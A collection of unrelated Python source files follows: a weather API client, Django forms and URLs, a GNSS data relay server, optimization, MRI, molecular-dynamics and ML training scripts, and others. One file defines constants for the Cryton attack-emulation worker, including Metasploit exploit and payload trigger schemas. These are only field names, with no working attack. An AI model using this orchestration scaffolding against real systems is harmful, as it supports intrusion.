info = genera_info(
self.__class__.__name__,
self.mesurades_metadades_x_totes_variables_d_1_estacio.__name__,
params,
)
raise MeteocatLocalError(codi_error, missatge_error, info)
else:
if estat and data:
params = neteja_diccionari(locals(), "self")
return self._aconsegueix(recurs, params)
def mesurades_metadades_x_1_variable_d_1_estacio(
self, codi_estacio: str, codi_variable: int
) -> dict:
"""
        Returns the metadata of the variable with the given code as measured by the station with the given code.
Args:
            codi_estacio (str): Identifier code of the weather station to query.
            codi_variable (int): Identifier code of the variable to query.
Returns:
dict: {
"codi": 3,
"nom": "Humitat relativa màxima",
"unitat": "%",
"acronim": "HRx",
"tipus": "DAT",
"decimals": 0,
"estats": [
{
"codi": 2,
"dataInici": "2009-07-15T09:00Z",
"dataFi": null
}
],
"basesTemporals": [
{
"codi": "HO",
"dataInici": "2009-07-15T09:00Z",
"dataFi": null
}
]
}
"""
recurs = (
f"estacions/{codi_estacio}/variables/mesurades/{codi_variable}/metadades"
)
return self._aconsegueix(recurs)
def mesurades_metadades_x_totes_variables(self) -> List[dict]:
"""
        Returns the metadata of every variable, regardless of which stations measure it.
Returns:
List[dict]: [
{
"codi": 1,
"nom": "Pressió atmosfèrica màxima",
"unitat": "hPa",
"acronim": "Px",
"tipus": "DAT",
"decimals": 1
},
...
{
"codi": 97,
"nom": "Temperatura superficial del mar",
"unitat": "°C",
"acronim": "TMAR",
"tipus": "DAT",
"decimals": 1
}
]
"""
recurs = "variables/mesurades/metadades"
return self._aconsegueix(recurs)
def mesurades_metadades_x_1_variable(self, codi_variable: int) -> dict:
"""
        Returns the metadata of the variable with the code given in the URL, regardless of which stations measure it.
        Args:
            codi_variable (int): Identifier code of the variable to query.
Returns:
dict: {
"codi": 1,
"nom": "Pressió atmosfèrica màxima",
"unitat": "hPa",
"acronim": "Px",
"tipus": "DAT",
"decimals": 1
}
"""
recurs = f"variables/mesurades/{codi_variable}/metadades"
return self._aconsegueix(recurs)
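# Minimal usage sketch (illustrative): Mesurades is a mixin that expects the
# concrete client to provide _aconsegueix(recurs, params=None), the method
# that performs the HTTP request against the Meteocat API. The client class
# name below is made up.
#
#     class MeteocatClient(Mesurades):
#         def _aconsegueix(self, recurs, params=None):
#             ...  # perform the authenticated request and return parsed JSON
#
#     client = MeteocatClient()
#     lectures = client.mesurades_x_1_variable_d_totes_estacions_o_1_estacio(
#         codi_variable=32, any=2017, mes=3, dia=27)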
| 2.484375
| 2
|
dashboard/core/forms.py
|
hebergui/webtrade
| 0
|
12782879
|
<reponame>hebergui/webtrade
from django import forms
from .models import Employee
class EmployeeForm(forms.ModelForm):
class Meta:
model = Employee
fields = ('name', 'position', 'office', 'age', 'start_date', 'salary')
| 2.171875
| 2
|
production/rtk_trans.py
|
gautodev/pcb_production_test_server
| 0
|
12782880
|
<reponame>gautodev/pcb_production_test_server
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
# File : production.py
# Author : bssthu
# Project : rtk_trans
# Description : forward data over sockets
#
import os
import sys
import json
import time
import signal
from production import log
from production.control_thread import ControlThread
from production.client_thread import ClientThread
from production.dispatcher_thread import DispatcherThread
from production.server_thread import ServerThread
from production.pcb_manager import PcbManager
class Rtk:
def __init__(self):
self.pcb_manager = PcbManager()
self.server = None
self.controller = None
self.dispatcher = None
self.client = None
self.is_interrupt = False
def got_data_cb(self, data, rcv_count):
"""接收到差分数据的回调函数
Args:
data: 收到的数据包
rcv_count: 收到的数据包的编号
"""
self.dispatcher.data_queue.put((data, rcv_count))
def got_client_cb(self, client_socket, address):
"""接受来自下层客户端的 socket 连接的回调函数
Args:
client_socket: 与客户端连接的 socket
address: 客户端地址
"""
self.dispatcher.add_client(client_socket, address)
def got_command_cb(self, command):
"""接收到来自控制端口的指令的回调函数
Args:
command: 待处理的命令
"""
if command == 'reset server':
old_dispatcher = self.dispatcher
self.dispatcher = DispatcherThread(self.pcb_manager.on_recv_heartbeat)
old_dispatcher.running = False
self.dispatcher.start()
elif command == 'list':
self.controller.msg_queue.put('client count: %d\r\n' % len(self.dispatcher.clients))
for _id, sender in self.dispatcher.clients.copy().items():
self.controller.msg_queue.put('%d: %s, %d\r\n' % (sender.sender_id, sender.address, sender.send_count))
elif command == 'pcb':
self.controller.msg_queue.put(self.pcb_manager.get_active_pcbs_info())
def exit_by_signal(self, signum, frame):
self.is_interrupt = True
def wait_for_keyboard(self):
"""quit when press q or press ctrl-c, or exception from other threads"""
try:
print("enter 'q' to quit")
while input() != 'q':
print("enter 'q' to quit. rcv count: %d, client count: %d"
% (self.client.rcv_count, len(self.dispatcher.clients)))
if not self.client.running or not self.server.running:
break
except KeyboardInterrupt:
pass
except EOFError:
# no input
signal.signal(signal.SIGINT, self.exit_by_signal)
while not self.is_interrupt:
time.sleep(1)
if not self.client.running or not self.server.running:
break
def main(self):
# config
config_file_name = os.path.join(sys.path[0], 'conf/config.json')
try:
with open(config_file_name) as config_fp:
configs = json.load(config_fp)
        except (IOError, ValueError):
print('failed to load config from config.json.')
return
# log init
log.initialize_logging(configs['enableLog'].lower() == 'true')
log.info('main: start')
# threads
self.server = ServerThread(configs['listenPort'], self.got_client_cb)
self.controller = ControlThread(configs['controlPort'], self.got_command_cb)
self.dispatcher = DispatcherThread(self.pcb_manager.on_recv_heartbeat)
self.client = ClientThread(configs['serverIpAddress'], configs['serverPort'], self.got_data_cb)
self.server.start()
self.controller.start()
self.dispatcher.start()
self.client.start()
# wait
self.wait_for_keyboard()
# quit & clean up
self.controller.running = False
self.controller.join()
self.client.running = False
self.client.join()
self.server.running = False
self.server.join()
self.dispatcher.running = False
self.dispatcher.join()
log.info('main: bye')
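if __name__ == '__main__':
    # Run the relay when executed as a script (the module only defines
    # Rtk.main() above; this launcher is a sketch of the expected usage).
    Rtk().main()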
| 2.265625
| 2
|
src/lib/approximation/dense.py
|
evolutics/sparse-approximation
| 0
|
12782881
|
"""
Minimizes D(b, Ax) for x ∈ ℝ₊^N where aₙ, b ∈ ℝ₊^M and D is a divergence.
These occur as ingredients of algorithms for the sparse case.
"""
import cvxpy
import numpy
def euclidean(A, b):
return _solve_convex(A, b, lambda p, q: cvxpy.norm2(p - q))
def total_variation(A, b):
return _solve_convex(A, b, lambda p, q: 0.5 * cvxpy.norm1(p - q))
def _solve_convex(A, b, D):
x = cvxpy.Variable(A.shape[1])
objective = cvxpy.Minimize(D(b, A @ x))
constraints = [x >= 0]
problem = cvxpy.Problem(objective, constraints)
problem.solve()
status = problem.status
assert status == cvxpy.OPTIMAL, f"Unable to solve optimization problem: {status}"
x = x.value
x[numpy.isclose(x, 0)] = 0
return x
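if __name__ == "__main__":
    # Quick illustrative check (not part of the module's API): b is an exact
    # nonnegative mixture of the columns of A, so the recovered x should be
    # close to [0.5, 0.5] for either divergence.
    A = numpy.array([[0.7, 0.1], [0.2, 0.3], [0.1, 0.6]])
    b = A @ numpy.array([0.5, 0.5])
    print(total_variation(A, b))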
| 2.90625
| 3
|
day09/shetuproject/shetuproject/spiders/start.py
|
Mhh123/spider
| 0
|
12782882
|
<reponame>Mhh123/spider
from scrapy import cmdline
cmdline.execute(['scrapy', 'crawl', 'image'])
| 1.859375
| 2
|
tools/commands/laravel.py
|
vertexportus/devdock
| 5
|
12782883
|
<gh_stars>1-10
import argparse
import re
from commands import base_command
from utils import env, file_regex_replace
class Laravel(base_command.BaseCommand):
@staticmethod
def argparse(parser, subparsers):
parser_main = subparsers.add_parser('laravel', help="runs artisan inside a laravel container")
parser_main.add_argument('-p', '--project', nargs="?", help="set laravel project to run composer on")
parser_main.add_argument('params', nargs=argparse.REMAINDER, help='artisan parameters')
def process_command(self):
project = self.get_project_by_name_or_default_by_tech(self.args.project, 'laravel')
container = project.get_container_by_tech('laravel')
if container is None:
raise Exception(f"container not found by stack")
params = ' '.join(self.args.params) if len(self.args.params) else ''
if 'key:generate' in self.args.params:
params = f"{params} --show"
key = self.container_exec_run_get_output(container.fullname, f"php artisan {params}")
file_regex_replace(env.project_path(f".{container.service.name}.env"), r"APP_KEY=[a-zA-Z0-9:]*\n", f"APP_KEY={key.strip()}\n")
else:
self.container_exec_run(container.fullname, f"php artisan {params}")
| 2.4375
| 2
|
api/urls.py
|
ferrumie/multi-pay
| 0
|
12782884
|
from django.urls import path
from api.authentication import CustomAuthToken
from api.views import (
ApiKeyDetail, ApiKeyView, PaymentConfirmationView, PaymentView,
RegisterUserView, TransactionList)
urlpatterns = [
# Register
path('user/register/', RegisterUserView.as_view(), name="register-user"),
path('user/view-token/', CustomAuthToken.as_view(), name='token-view'),
# Transaction List
path('transactions/', TransactionList.as_view(), name='transaction-list'),
# API Key
path('user/apikeys/', ApiKeyView.as_view(), name='apikeys'),
path('user/apikeys/<int:key_id>/',
ApiKeyDetail.as_view(), name='apikey-detail'),
# Payment
path('payment/', PaymentView.as_view(), name='payment'),
path('payment/confirm/', PaymentConfirmationView.as_view(),
name='payment-confirm'),
]
| 1.820313
| 2
|
java2s/toolbarbuttons.py
|
mhcrnl/PmwTkEx
| 0
|
12782885
|
<reponame>mhcrnl/PmwTkEx
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Try both imports so the code runs under Python 2 and Python 3
try:
#Python 2
import Tkinter as tk
except ImportError:
#Python 3
import tkinter as tk
title = "Toolbar Buttons"
geometry = "400x400+100+100"
class ToolbarButtons():
def __init__(self, master):
self.master = master
        # Begin: add toolbar to the window -----------------------
toolbar=tk.Frame(master)
        # ------------------------- BEGIN: add New button
fotoNew =tk.PhotoImage(file="reflectionsm.GIF")
newBtn = tk.Button(toolbar, text="New", image=fotoNew, compound="left")
newBtn.pack(side="left", padx=2, pady=2)
newBtn.image=fotoNew
        # ------------------------- END: add New button
openBtn=tk.Button(toolbar, text="Open", width=6)
openBtn.pack(side="right", padx=2, pady=2)
#-------------------------END/Add Button Open
fotoClose=tk.PhotoImage(file='close.gif')
closeBtn=tk.Button(toolbar, text="Close", image=fotoClose,
compound="left", height=20, command=master.quit)
closeBtn.pack(side="right", padx=2, pady=2)
closeBtn.image=fotoClose
toolbar.pack(side="top", fill="x")
        # END: add toolbar to the window ------------------------
if __name__ == "__main__":
root = tk.Tk()
root.title(title)
root.geometry(geometry)
ToolbarButtons(root)
    root.mainloop()
    try:
        root.destroy()  # may already be gone if the window was closed directly
    except tk.TclError:
        pass
| 2.625
| 3
|
cryton_worker/lib/util/constants.py
|
slashsec-edu/cryton-worker
| 0
|
12782886
|
from datetime import datetime
from schema import Optional, Or
# Main queue constants
ACTION = "action"
CORRELATION_ID = "correlation_id"
DATA = "data"
RESULT_PIPE = "result_pipe"
QUEUE_NAME = "queue_name"
PROPERTIES = "properties"
HIGH_PRIORITY = 0
MEDIUM_PRIORITY = 1
LOW_PRIORITY = 2
# Processor action types
ACTION_KILL_TASK = "_kill_task"
ACTION_FINISH_TASK = "_finish_task"
ACTION_START_TRIGGER = "_start_trigger"
ACTION_STOP_TRIGGER = "_stop_trigger"
ACTION_LIST_TRIGGERS = "_list_triggers"
ACTION_SEND_MESSAGE = "_send_message"
ACTION_SHUTDOWN_THREADED_PROCESSOR = "shutdown_threaded_processor"
# Event types
EVENT_VALIDATE_MODULE = "VALIDATE_MODULE"
EVENT_LIST_MODULES = "LIST_MODULES"
EVENT_LIST_SESSIONS = "LIST_SESSIONS"
EVENT_KILL_STEP_EXECUTION = "KILL_STEP_EXECUTION"
EVENT_HEALTH_CHECK = "HEALTH_CHECK"
EVENT_START_TRIGGER = "START_TRIGGER"
EVENT_STOP_TRIGGER = "STOP_TRIGGER"
EVENT_TRIGGER_STAGE = "TRIGGER_STAGE"
EVENT_LIST_TRIGGERS = "LIST_TRIGGERS"
# Trigger types
HTTP = "HTTP"
MSF = "MSF"
# Trigger constants
TRIGGER_HOST = "host"
TRIGGER_PORT = "port"
TRIGGER_TYPE = "trigger_type"
TRIGGER_STAGE_EXECUTION_ID = "stage_execution_id"
TRIGGER_PARAMETERS = "parameters"
TRIGGER_ID = "trigger_id"
EXPLOIT = "exploit"
PAYLOAD = "payload"
EXPLOIT_ARGUMENTS = "exploit_arguments"
PAYLOAD_ARGUMENTS = "payload_arguments"
# Step types
STEP_TYPE = "step_type"
STEP_TYPE_EXECUTE_ON_WORKER = 'cryton/execute-on-worker'
STEP_TYPE_DEPLOY_AGENT = 'empire/deploy-agent'
STEP_TYPE_EXECUTE_ON_AGENT = 'empire/execute-on-agent'
# RabbitMQ message keywords
EVENT_T = "event_t"
EVENT_V = "event_v"
ARGUMENTS = "arguments"
DEFAULT_MSG_PROPERTIES = {"content_encoding": "utf-8", 'timestamp': datetime.now()}
TARGET_IP = "target_ip"
SESSION_LIST = "session_list"
MODULE_LIST = "module_list"
TRIGGER_LIST = "trigger_list"
ACK_QUEUE = "ack_queue"
# Step type execute-on-worker arguments keywords
ATTACK_MODULE = "attack_module"
ATTACK_MODULE_ARGUMENTS = "attack_module_args"
# Step type execute-on-agent arguments keywords
USE_AGENT = "use_agent"
EMPIRE_MODULE = "empire_module"
EMPIRE_MODULE_ARGUMENTS = "empire_module_args"
EMPIRE_SHELL_COMMAND = "shell_command"
# Step type deploy-agent arguments keywords
STAGER_ARGUMENTS = "stager_arguments"
STAGER_ARGS_STAGER_TYPE = "stager_type"
STAGER_ARGS_TARGET_OS_TYPE = "os_type"
STAGER_ARGS_LISTENER_TYPE = "listener_type"
STAGER_ARGS_LISTENER_NAME = "listener_name"
STAGER_ARGS_LISTENER_PORT = "listener_port"
STAGER_ARGS_AGENT_NAME = "agent_name"
STAGER_ARGS_STAGER_OPTIONS = "stager_options"
STAGER_ARGS_LISTENER_OPTIONS = "listener_options"
# Session system keywords
SESSION_ID = 'session_id'
CREATE_NAMED_SESSION = 'create_named_session'
USE_NAMED_SESSION = 'use_named_session'
USE_ANY_SESSION_TO_TARGET = 'use_any_session_to_target'
SSH_CONNECTION = 'ssh_connection'
# Other constants
RETURN_CODE = "return_code"
STD_ERR = "std_err"
STD_OUT = "std_out"
CODE_ERROR = -2
CODE_OK = 0
CODE_KILL = -3
FILE = "file"
FILE_CONTENT = "file_content"
FILE_ENCODING = "file_encoding"
BASE64 = "base64"
UTF8 = "utf8"
REPLY_TO = "reply_to"
# ControlTask validation schemas
EVENT_VALIDATE_MODULE_SCHEMA = {ATTACK_MODULE: str, ATTACK_MODULE_ARGUMENTS: dict}
EVENT_LIST_MODULES_SCHEMA = dict
EVENT_LIST_SESSIONS_SCHEMA = {Optional(Or("type", "tunnel_local", "tunnel_peer", "via_exploit", "via_payload", "desc",
"info", "workspace", "session_host", "session_port", "target_host",
"username", "uuid", "exploit_uuid", "routes", "arch")): Or(str, int)}
EVENT_KILL_STEP_EXECUTION_SCHEMA = {"correlation_id": str}
EVENT_HEALTH_CHECK_SCHEMA = {}
EVENT_START_TRIGGER_HTTP_SCHEMA = {"host": str, "port": int, "trigger_type": "HTTP", "reply_to": str, "routes": [
{"path": str, "method": str, "parameters": [{"name": str, "value": str}]}]}
EVENT_START_TRIGGER_MSF_SCHEMA = {"host": str, "port": int, "exploit": str,
Optional("exploit_arguments"): {Optional(str): Or(str, int)},
"payload": str, Optional("payload_arguments"): {Optional(str): Or(str, int)},
"trigger_type": "MSF", "reply_to": str}
EVENT_STOP_TRIGGER_SCHEMA = {"trigger_id": str}
EVENT_LIST_TRIGGERS_SCHEMA = {}
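# Illustrative note: these dictionaries are meant to be wrapped in
# schema.Schema before validating incoming payloads, e.g.:
#
#     from schema import Schema
#     Schema(EVENT_KILL_STEP_EXECUTION_SCHEMA).validate({"correlation_id": "abc123"})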
| 2
| 2
|
datasets/spmotif_dataset.py
|
Wuyxin/DIR-GNN
| 34
|
12782887
|
import os.path as osp
import pickle as pkl
import torch
import random
import numpy as np
from torch_geometric.data import InMemoryDataset, Data
class SPMotif(InMemoryDataset):
splits = ['train', 'val', 'test']
def __init__(self, root, mode='train', transform=None, pre_transform=None, pre_filter=None):
assert mode in self.splits
self.mode = mode
super(SPMotif, self).__init__(root, transform, pre_transform, pre_filter)
idx = self.processed_file_names.index('SPMotif_{}.pt'.format(mode))
self.data, self.slices = torch.load(self.processed_paths[idx])
@property
def raw_file_names(self):
return ['train.npy', 'val.npy', 'test.npy']
@property
def processed_file_names(self):
return ['SPMotif_train.pt', 'SPMotif_val.pt', 'SPMotif_test.pt']
def download(self):
if not osp.exists(osp.join(self.raw_dir, 'raw', 'SPMotif_train.npy')):
print("raw data of `SPMotif` doesn't exist, please redownload from our github.")
raise FileNotFoundError
def process(self):
idx = self.raw_file_names.index('{}.npy'.format(self.mode))
edge_index_list, label_list, ground_truth_list, role_id_list, pos = np.load(osp.join(self.raw_dir, self.raw_file_names[idx]), allow_pickle=True)
data_list = []
for idx, (edge_index, y, ground_truth, z, p) in enumerate(zip(edge_index_list, label_list, ground_truth_list, role_id_list, pos)):
            edge_index = torch.from_numpy(edge_index).long()
node_idx = torch.unique(edge_index)
assert node_idx.max() == node_idx.size(0) - 1
x = torch.zeros(node_idx.size(0), 4)
index = [i for i in range(node_idx.size(0))]
x[index, z] = 1
            x = torch.rand((node_idx.size(0), 4))  # overwrites the one-hot features above with random node features
edge_attr = torch.ones(edge_index.size(1), 1)
y = torch.tensor(y, dtype=torch.long).unsqueeze(dim=0)
data = Data(x=x, y=y, z=z,
edge_index=edge_index,
edge_attr=edge_attr,
pos=p,
edge_gt_att=torch.LongTensor(ground_truth),
name=f'SPMotif-{self.mode}-{idx}', idx=idx)
if self.pre_filter is not None and not self.pre_filter(data):
continue
if self.pre_transform is not None:
data = self.pre_transform(data)
data_list.append(data)
idx = self.processed_file_names.index('SPMotif_{}.pt'.format(self.mode))
print(self.processed_paths[idx])
print(len(data_list))
torch.save(self.collate(data_list), self.processed_paths[idx])
| 2.21875
| 2
|
src/experiment.py
|
rainwangphy/cgate
| 15
|
12782888
|
<gh_stars>10-100
"""Experiments infrastructure.
This module contains functions with preparations for an experiment.
"""
import os
from config import cfg
def init():
r"""
    Checks whether the results folder has already been used and prevents overwriting of its results.
Returns:
None
"""
old, new = cfg.RESULTS_ROOT / 'cfg.py', cfg.ROOT_DIR / 'config' / 'cfg.py'
if old.exists():
if os.system(f'cmp --silent {old} {new}'):
raise EnvironmentError('Config file in RESULTS_ROOT already exists and differs from the one in config/')
os.system(f'cp {new} {old}')
| 2.515625
| 3
|
msm_pele/AdaptivePELE/freeEnergies/extendTrajectories.py
|
danielSoler93/msm_pele
| 13
|
12782889
|
<gh_stars>10-100
from __future__ import absolute_import, division, print_function, unicode_literals
import numpy as np
import glob
import os
import re
import sys
import argparse
import ast
def parseArguments():
desc = "Program that extends trajectories.\n\
Trajectories are joined with those from which the spawning cluster was discovered\n\
Two options are available:\n\
*) full: Trajectories are traced back to epoch 0\n\
*) prev: Trajectories are extended with up to the last 'lagtime' snapshots of a previous trajectory\n"
parser = argparse.ArgumentParser(description=desc, formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument("--type", choices=['full', 'prev'], default='prev', help="Traj reconstruction type")
parser.add_argument("-l", "--lagtime", default=0, type=int, help="Lagtime to be used (if proceeds)")
parser.add_argument("--outputDir", default="allTrajs_reconstructed", help="Output directory")
parser.add_argument("--inputDir", default="allTrajs", help="Directory with trajectories")
args = parser.parse_args()
return args.type, args.lagtime, args.outputDir, args.inputDir
def tryToOpenMapping(mapFilename):
try:
with open(mapFilename) as f:
mapping = f.read().split(":")
opened = True
    except IOError:
mapping = None
opened = False
return mapping, opened
def sameCoords(coords1, coords2):
threshold = 1e-4
diff = np.abs(coords1 - coords2)
return (diff < threshold).all()
def checkFirstMatchingSnapshot(traj, snapshot, coords):
for i in range(snapshot, traj.shape[0]):
if sameCoords(coords[1:], traj[i, 1:]): # coords[0] is the snapshot num, which is not important and is discarded in MSM
firstMatchingSnapshot = i
return firstMatchingSnapshot
raise IndexError
def findSnapshotAndOpenTraj(trajName, lastSnapshot, coords, firstSnapshot=0):
if lastSnapshot is None or coords is None:
return np.loadtxt(trajName)[firstSnapshot:]
else:
traj = np.loadtxt(trajName)
try:
snapshot = checkFirstMatchingSnapshot(traj, lastSnapshot, coords)
return traj[firstSnapshot:snapshot]
except IndexError:
sys.exit("Did not find matching traj in trajName: %s; coords:%s, from snapshot:%d" % (trajName, coords, lastSnapshot))
def reconstructFullTrajectory(mapping, thisTrajMap, trajNameTempletized, coords):
"""
thisTrajMap contains the exact point at which a cluster was discovered
Note that the number of snapshot corresponds to the accepted steps and
not absolute steps. There are different ways to overcome the limitation.
The fastest is looking at the report file. A slower way is looking at
the exact coordinates. It is slower, but the main advantage is that we
do not need any extra file.
"""
(epoch, num, snapshot) = thisTrajMap
try:
thisTraj = findSnapshotAndOpenTraj(trajNameTempletized % (epoch, num), snapshot, coords)
    except (IOError, SystemExit):  # workaround for an adaptiveSampling error; remove this block once the bug is found
epoch += 1
thisTraj = findSnapshotAndOpenTraj(trajNameTempletized % (epoch, num), snapshot, coords)
if epoch == 0:
return thisTraj
else:
prevTrajMap = ast.literal_eval(mapping[epoch][num-1])
return np.vstack((reconstructFullTrajectory(mapping, prevTrajMap, trajNameTempletized, thisTraj[0]), thisTraj))
def addUncountedSnapshots(mapping, thisTrajMap, trajNameTempletized, coords, lagtime):
"""
This function adds all possible previous uncounted snapshots
(i.e. those in the last lagtime snapshots) to the current traj
thisTrajMap contains the exact point at which a cluster was discovered
Note that the number of snapshot corresponds to the accepted steps and
not absolute steps. There are different ways to overcome the limitation.
The fastest is looking at the report file. A slower way is looking at
the exact coordinates. It is slower, but the main advantage is that we
do not need any extra file.
"""
(epoch, num, snapshot) = thisTrajMap
thisTraj = findSnapshotAndOpenTraj(trajNameTempletized % (epoch, num), snapshot, None)
if epoch == 0:
return thisTraj
prevTrajMap = ast.literal_eval(mapping[epoch][num-1])
(epoch, num, snapshot) = prevTrajMap
try:
# only consider the last "lagtime" snapshots
# if the initial point was found before the last lagtime snapshots, then: prevTraj = []
prevTraj = findSnapshotAndOpenTraj(trajNameTempletized % (epoch, num), snapshot, thisTraj[0], firstSnapshot=-lagtime)
    except (IOError, SystemExit):
epoch += 1
prevTraj = findSnapshotAndOpenTraj(trajNameTempletized % (epoch, num), snapshot, thisTraj[0], firstSnapshot=-lagtime)
return np.vstack((prevTraj, thisTraj))
def main():
choice, lagtime, outputDir, inputDir = parseArguments()
mapFilename = "%d/processorMapping.txt"
if not os.path.exists(outputDir):
os.makedirs(outputDir)
trajWildcard = "traj_%d_*.dat" # %d for the epoch
trajName = "traj_%d_%d.dat" # %d for the epoch and number
trajNameTempletized = os.path.join(inputDir, trajName)
allFolders = os.listdir(".")
epochFolders = [int(re.sub("MSM_", "", epoch)) for epoch in allFolders if epoch.startswith("MSM")]
numberOfEpochs = max(epochFolders)
mappings = []
for epoch in range(0, numberOfEpochs):
epochMapping, _ = tryToOpenMapping(mapFilename % epoch)
mappings.append(epochMapping)
newSizes = []
for epoch in range(0, numberOfEpochs):
allFiles = glob.glob(os.path.join(inputDir, trajWildcard % epoch))
for source in allFiles:
print(source)
num = int(source.split("_")[-1][:-4])
if choice == "full":
fullTraj = reconstructFullTrajectory(mappings, (epoch, num, None), trajNameTempletized, None)
elif choice == "prev":
fullTraj = addUncountedSnapshots(mappings, (epoch, num, None), trajNameTempletized, None, lagtime)
newSizes.append(fullTraj.shape[0])
fname = os.path.split(source)[-1]
dst = os.path.join(outputDir, fname)
np.savetxt(dst, fullTraj)
newSizes = np.array(newSizes)
avgNewSize = np.average(newSizes)
print("")
print("Avg new size: %.2f +/- %.2f" % (avgNewSize, np.std(newSizes)))
try:
origSize = np.loadtxt(allFiles[0]).shape[0]
print("Assuming orig trajectories of %d steps" % origSize)
print("New trajectories are {0:.2f}% larger".format((avgNewSize/origSize - 1)*100))
    except (IOError, IndexError):
pass
if __name__ == "__main__":
main()
| 2.578125
| 3
|
src/models/train_model.py
|
ralucaj/dtu_mlops
| 0
|
12782890
|
import logging
import hydra
import torch
from model import MyAwesomeModel
from pytorch_lightning import Trainer
from pytorch_lightning.callbacks.early_stopping import EarlyStopping
from torch.utils.data import DataLoader
from src.data.mnist import CorruptedMNIST
log = logging.getLogger(__name__)
@hydra.main(config_path="configs", config_name="mnist_config.yaml")
def train(cfg):
print("Training day and night")
model = MyAwesomeModel(cfg.model)
train_loader = DataLoader(
CorruptedMNIST(cfg.training.train_set), batch_size=cfg.training.batch_size
)
validation_loader = DataLoader(
CorruptedMNIST(cfg.training.valid_set), batch_size=cfg.training.batch_size
)
early_stopping_callback = EarlyStopping(
monitor="valid_loss", patience=3, verbose=True, mode="min"
)
trainer = Trainer(
max_epochs=cfg.training.epochs,
accelerator="gpu",
gpus=1,
limit_train_batches=cfg.training.limit_train_batches,
callbacks=[early_stopping_callback],
)
trainer.fit(
model, train_dataloaders=train_loader, val_dataloaders=validation_loader
)
# Save model
torch.save(model.state_dict(), cfg.training.model_path)
script_model = torch.jit.script(model)
script_model.save('deployable_model.pt')
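
# A sketch of the Hydra config this script expects (configs/mnist_config.yaml).
# The keys mirror the cfg accesses above; all values are placeholders, and the
# contents of the `model` group depend on what MyAwesomeModel defines:
#
#     model:
#       lr: 1.0e-3            # hypothetical
#     training:
#       train_set: data/processed/train.npz
#       valid_set: data/processed/valid.npz
#       batch_size: 64
#       epochs: 10
#       limit_train_batches: 1.0
#       model_path: models/trained_model.pt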
if __name__ == "__main__":
    train()
| 2.234375
| 2
|
seraphim/util/reducible_helper.py
|
kluhan/seraphim
| 0
|
12782891
|
from seraphim.finite_fields.polynomial import Polynomial
from seraphim.mod_arithmetics.modulare_arithmetic_efficient import RestclassEfficient
def is_reducible(polynom, p):
    """Return (True, m) for the first polynomial m of positive degree that divides polynom over Z mod p; otherwise (False, None)."""
    intmod = RestclassEfficient(1, p).get_representative()
    zmodx = [Polynomial(list(reversed(x))) for x in intmod]
    zero = polynom - polynom
    for m in zmodx:
        if m.deg() > 0 and polynom % m == zero:
            return True, m
    return False, None
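
# A minimal sketch of calling is_reducible (the concrete polynomial and the
# coefficient convention of the Polynomial constructor are illustrative):
#
#     poly = Polynomial([1, 0, 1])      # e.g. x^2 + 1
#     reducible, divisor = is_reducible(poly, 2)
#     if reducible:
#         print("divisible by", divisor)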
| 2.890625
| 3
|
scripts/01_MEGRE/05_split_echoes.py
|
ofgulban/meso-MRI
| 1
|
12782892
|
"""Split each echo to prepare for registration."""
import os
import subprocess
import numpy as np
import nibabel as nb
# =============================================================================
NII_NAMES = [
'/home/faruk/data/DATA_MRI_NIFTI/derived/sub-23/T2s/01_crop/sub-23_ses-T2s_run-01_dir-AP_part-mag_MEGRE_crop.nii.gz',
'/home/faruk/data/DATA_MRI_NIFTI/derived/sub-23/T2s/01_crop/sub-23_ses-T2s_run-02_dir-RL_part-mag_MEGRE_crop.nii.gz',
'/home/faruk/data/DATA_MRI_NIFTI/derived/sub-23/T2s/01_crop/sub-23_ses-T2s_run-03_dir-PA_part-mag_MEGRE_crop.nii.gz',
'/home/faruk/data/DATA_MRI_NIFTI/derived/sub-23/T2s/01_crop/sub-23_ses-T2s_run-04_dir-LR_part-mag_MEGRE_crop.nii.gz',
]
OUTDIR = "/home/faruk/data/DATA_MRI_NIFTI/derived/sub-23/T2s/05_split_echoes"
# =============================================================================
print("Step_05: Split echoes.")
# Output directory
if not os.path.exists(OUTDIR):
os.makedirs(OUTDIR)
print(" Output directory: {}".format(OUTDIR))
# Split each run into its individual echoes
for i, nii_name in enumerate(NII_NAMES):
# Load data
nii = nb.load(nii_name)
temp = np.squeeze(np.asanyarray(nii.dataobj))
# Save each echo separately
basename, ext = nii.get_filename().split(os.extsep, 1)
basename = os.path.basename(basename)
out_name = os.path.join(OUTDIR, basename)
for j in range(temp.shape[-1]):
echo = np.squeeze(temp[..., j])
img = nb.Nifti1Image(echo, affine=nii.affine, header=nii.header)
nb.save(img, '{}_echo{}.nii.gz'.format(out_name, j+1))
print(' Finished.')
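
# Output naming illustration: an input ..._MEGRE_crop.nii.gz with 3 echoes in
# its last dimension yields ..._MEGRE_crop_echo1.nii.gz through
# ..._MEGRE_crop_echo3.nii.gz in OUTDIR.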
| 1.90625
| 2
|
warn_transformer/transformers/in.py
|
chriszs/warn-transformer
| 3
|
12782893
|
import typing
from datetime import datetime
from ..schema import BaseTransformer
class Transformer(BaseTransformer):
"""Transform Indiana raw data for consolidation."""
postal_code = "IN"
fields = dict(
company="Company",
location="City",
notice_date="Notice Date",
effective_date="LO/CL Date",
jobs="Affected Workers",
)
date_format = ["%m/%d/%Y", "%m/%d/%y", "%B %Y", "%Y", "%b %Y", "%m/%Y"]
jobs_corrections = {
"97 (in MI)0 (in IN)": 0,
"100+": 100,
"62 MAY be affected": 62,
"5 in Indiana": 5,
"Unknown": None,
"75 in Indiana": 75,
"40-50": 40,
"100-130": 100,
"4 Hoosiers": 4,
"Undisclosed at this time": None,
"500 Nationwide": None,
"NA": None,
"103 (REVISED) 10/22/2020 108": 103,
}
date_corrections = {
"01/30/1202": datetime(2012, 1, 30),
"April/June 2020": datetime(2020, 4, 1),
"Unknown": None,
"Q1 2019": datetime(2019, 1, 1),
"Q1 2018": datetime(2018, 1, 1),
"Sept. 2016": datetime(2016, 9, 1),
"No closure date announced. Layoffs to commence 05/27/2015": datetime(
2015, 5, 27
),
"TBD": None,
"09/22/2014-12/07/2014": datetime(2014, 9, 22),
"08/18/2014-12/31/2014": datetime(2014, 8, 18),
"End of 2013": datetime(2013, 12, 31),
"Mid-Year 2014": datetime(2014, 6, 15),
"02/29/2013": datetime(2013, 2, 28),
"year end 2014": datetime(2014, 12, 31),
"4th Qtr 2012": datetime(2012, 9, 1),
"Mid February 2012": datetime(2012, 2, 14),
"3rd Qtr 2012": datetime(2012, 6, 1),
"LO-01/14/2011 CL-End of 2012": datetime(2011, 1, 14),
"Prior to the end of 2009 (as stated in the WARN notice)": datetime(
2009, 12, 31
),
